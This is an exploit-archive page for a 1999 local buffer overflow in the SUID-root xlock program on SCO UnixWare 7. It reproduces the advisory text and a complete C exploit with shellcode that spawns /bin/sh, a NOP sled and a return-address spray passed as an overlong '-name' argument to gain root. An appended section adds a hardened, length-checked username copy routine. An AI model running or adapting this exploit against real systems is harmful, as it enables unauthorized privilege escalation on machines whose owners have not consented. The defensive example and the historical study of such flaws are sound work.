SCO Unixware 7.0 – ‘xlock(1)’ ‘Username’ Local Buffer Overflow


Vulnerability ID: 1053430
Vulnerability type:
Published: 1999-11-25    Updated: 1999-11-25
CVE number: N/A
CNNVD ID: N/A
Platform: SCO    CVSS score: N/A
Source: https://www.exploit-db.com/exploits/19642
Details: vulnerability details have not been disclosed.
Exploit:
source: http://www.securityfocus.com/bid/825/info

Certain versions of UnixWare ship with a version of xlock that is vulnerable to a buffer overflow. The xlock(1) program locks the local X display until a username and password are entered. A local user can supply an overly long username and overflow a fixed-size buffer in xlock(1). Because xlock(1) is installed SUID root, a successful overflow yields root privileges.

// UnixWare7 /usr/bin/xlock local, K2, revisited Oct-30-1999
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Payload bytes as published; the backslash escapes were lost in
   extraction and are restored here. */
char shell[] =
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";

#define SIZE 1200       /* total length of the argument handed to xlock */
#define NOPDEF 601      /* default NOP sled length */
#define DEFOFF -400     /* default offset from the current stack pointer */

const char x86_nop=0x90;
long nop=NOPDEF,esp;
long offset=DEFOFF;
char buffer[SIZE];

/* Returns the current stack pointer (the asm leaves it in %eax). */
long get_esp() { __asm__("movl %esp,%eax"); }

int main (int argc, char *argv[])
{
    register int i;

    if (argc > 1) offset += strtol(argv[1], NULL, 0);   /* optional offset adjustment */
    if (argc > 2) nop += strtoul(argv[2], NULL, 0);     /* optional sled-length adjustment */
    esp = get_esp();

    memset(buffer, x86_nop, SIZE);                      /* NOP sled */
    memcpy(buffer+nop, shell, strlen(shell));           /* payload after the sled */

    /* Fill the remainder with the guessed return address. */
    for (i = nop+strlen(shell); i < SIZE-4; i += 4)
        *((int *) &buffer[i]) = esp+offset;

    printf("jmp = [0x%lx]\toffset = [%ld]\n", esp+offset, offset);
    execl("/usr/X/bin/xlock", "xlock", "-name", buffer, NULL);

    printf("exec failed!\n");
    return 0;
}
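An added example, not part of the original advisory and not xlock's source (which is not on this page): the hardened form of the input-handling defect described above, a bounded, policy-checked copy of the username that rejects an argument of the size the exploit builds instead of overrunning the destination. The 64-byte destination, the NAME_MAX_LEN limit and the character policy are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define NAME_MAX_LEN 32   /* assumed policy limit for a login name, not a value from the page */

/* Defect class described above: roughly `char name[64]; strcpy(name, input);`
 * with no length check, so an overly long "username" overruns the stack buffer.
 * copy_name_checked() is the hardened replacement: bounded scan, length and
 * character policy, and only then a copy. Returns 0 on success, -1 on rejection. */
int copy_name_checked(char *out, size_t outsz, const char *in)
{
    size_t n = 0, i;
    if (in == NULL || outsz == 0) return -1;
    while (n <= NAME_MAX_LEN && in[n] != '\0') n++;   /* never scans past the limit */
    if (n == 0 || n > NAME_MAX_LEN || n >= outsz) return -1;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)in[i];
        if (!isalnum(c) && c != '_' && c != '-' && c != '.') return -1;
    }
    memcpy(out, in, n);
    out[n] = '\0';
    return 0;
}

/* Runs the check against a 64-byte destination (assumed size). */
int check_name(const char *in)
{
    char name[64];
    return copy_name_checked(name, sizeof name, in);
}

/* Builds a len-byte run of 'A' (the exploit above passes a 1200-byte argument)
 * and returns the check result for it. */
int check_long_name(size_t len)
{
    char *in = malloc(len + 1);
    int rc;
    if (in == NULL) return -2;
    memset(in, 'A', len);
    in[len] = '\0';
    rc = check_name(in);
    free(in);
    return rc;
}
```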
